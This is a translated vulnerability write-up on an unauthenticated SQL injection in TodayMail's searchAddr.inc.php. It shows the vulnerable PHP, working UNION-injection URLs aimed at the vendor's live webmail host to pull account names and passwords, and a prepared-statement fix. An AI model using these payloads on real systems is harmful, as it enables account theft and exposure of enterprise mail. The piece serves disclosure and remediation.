An unauthenticated SQL injection in TodayMail can easily dump large numbers of enterprise mailbox accounts

Posted by 没穿底裤 on 2020-01-01 04:51:13 · 511 views · 4350 characters · 14 min 30 s read
Abstract

TodayMail (时代企业邮) is introduced at http://www.now.cn/email/overview.net; search keyword: 时代企业邮


Vulnerability author: xfkxfk

Details:

TodayMail (时代企业邮) is introduced here:

http://www.now.cn/email/overview.net

Search keyword: 时代企业邮

There are many instances, so no screenshots of those.

File searchAddr.inc.php:

```php
<?
header('Content-Type:text/xml;charset=UTF-8');
include_once "../config/dbremote.inc.php";
include_once "../../core/emailcore.class.inc.php";   // no login-check file is included here

$value=trim($_REQUEST['value']);      // user input, passed on unfiltered
$tm_id=trim($_REQUEST['ftm_id']);     // tenant id also taken from the request
$EmailCore = new EmailCore($tm_id);
$addrList=$EmailCore->searchAddrAllByKeyword($value);
$str="<?xml version=\"1.0\" encoding=\"UTF-8\"?><properties><property>";
$str.="<num>".count($addrList)."</num>";
for($i=0;$i<count($addrList);$i++){
        $str.="<name".$i.">".$addrList[$i]['name']."</name".$i.">";
        $str.="<email".$i.">".$addrList[$i]['email']."</email".$i.">";
}
$str.="</property></properties>";
echo $str;
?>
```

First:

You can see that no login-check file is included here, so the page can be accessed directly without logging in.

Then $value=trim($_REQUEST['value']);

followed by $addrList=$EmailCore->searchAddrAllByKeyword($value);

Following the function searchAddrAllByKeyword into emailcore.class.inc.php:

```php
function searchAddrAllByKeyword($value){
        //global $db_remote;
        $addrArray=array();
        // $value is concatenated straight into the LIKE clauses below
        $sql="select name,email from address  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";
        $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
        while($array=mysql_fetch_assoc($rs)){
                $addrArray[]=$array;
        }
        $sql="select tm_name as name,tm_domain as email from todaymail  where tm_domain='".$this->EmailInfo['tm_domain']."' and (tm_name like '%$value%' or tm_domain like '%$value%') and tm_status in (1,3) and tm_level <> '1' order by tm_name asc";
//              echo $sql;
        $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
        while($array=mysql_fetch_assoc($rs)){
                $array['email']=$array['name']."@".$array['email'];
                $addrArray[]=$array;
        }
        $sql="select name,email from mailcard  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";
        $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
        while($array=mysql_fetch_assoc($rs)){
                $addrArray[]=$array;
        }
        return $addrArray;
}
```

It is plain to see that $value goes straight into the SELECT statements without any filtering, which produces the SQL injection.

So data can be pulled out directly, without logging in.

Unfortunately no server privileges were obtained, but the domain names show that a large number of enterprises are hosted here.

Take the official site as an example:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,%27@@@%27,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

From the tm_domain field here, about 4000 domain names can be seen.

[Screenshot omitted]

After deduplication there are still 3000+ domains, which means 3000+ enterprises.

Proof of vulnerability:

Take the official site as an example:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

This reads the username, domain and password of 1000 users.

[Screenshot omitted]

A few more examples, picked at random, were reproduced on other hosted domains.


There are many databases as well, so mail contents and the like would also leak.

The user base is very large, so this should be rated high-risk; the mail systems of many enterprises would essentially all be compromised.

Fix:

Include the login-check file, and filter the input.
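As an added example (not TodayMail's code), here is what that fix amounts to in practice for the handler and the search function shown above: a session check in front, and mysqli prepared statements so the keyword can never become SQL text. $db, $_SESSION['tm_id'] and $_SESSION['tm_domain'] are assumed names, and get_result() assumes the mysqlnd driver.

```php
<?php
// Added example, not TodayMail's code: the search rewritten on mysqli prepared
// statements behind a session check. Assumed names: $db (open mysqli connection),
// $_SESSION['tm_id'] / $_SESSION['tm_domain'] (tenant of the logged-in user).

// Run one prepared SELECT and return its rows; $types is the bind_param type string.
function fetchRows(mysqli $db, string $sql, string $types, array $params): array
{
    $stmt = $db->prepare($sql);
    $stmt->bind_param($types, ...$params);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}
// Build the LIKE pattern, escaping '\', '%' and '_' so they match literally.
function likePattern(string $keyword): string
{
    return '%' . addcslashes($keyword, '\\%_') . '%';
}

function searchAddrAllByKeyword(mysqli $db, int $tmId, string $tmDomain, string $keyword): array
{
    $p = likePattern(trim($keyword));
    // The keyword travels as a bound parameter, never as SQL text, so a value
    // such as  %') union select ... #  is only ever compared as a string.
    $out = fetchRows($db,
        'SELECT name, email FROM address WHERE ftm_id = ? AND (name LIKE ? OR email LIKE ?)',
        'iss', [$tmId, $p, $p]);
    $accounts = fetchRows($db,
        'SELECT tm_name AS name, tm_domain AS email FROM todaymail WHERE tm_domain = ?'
        . ' AND (tm_name LIKE ? OR tm_domain LIKE ?) AND tm_status IN (1,3)'
        . " AND tm_level <> '1' ORDER BY tm_name ASC",
        'sss', [$tmDomain, $p, $p]);
    foreach ($accounts as $row) {
        $row['email'] = $row['name'] . '@' . $row['email'];
        $out[] = $row;
    }
    return array_merge($out, fetchRows($db,
        'SELECT name, email FROM mailcard WHERE ftm_id = ? AND (name LIKE ? OR email LIKE ?)',
        'iss', [$tmId, $p, $p]));
}
// Handler: require a logged-in session and take the tenant from it rather than
// from the client-supplied ftm_id that the original file trusts.
session_start();
if (empty($_SESSION['tm_id'])) {
    http_response_code(401);
    exit;
}
$addrList = searchAddrAllByKeyword($db, (int) $_SESSION['tm_id'],
    (string) $_SESSION['tm_domain'], (string) ($_REQUEST['value'] ?? ''));
```

The XML output loop from the original file can then consume $addrList unchanged, though escaping each name and email with htmlspecialchars($v, ENT_XML1) before echoing is the safe habit.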

Source (CN-SEC repost): http://cn-sec.com/archives/76581.html
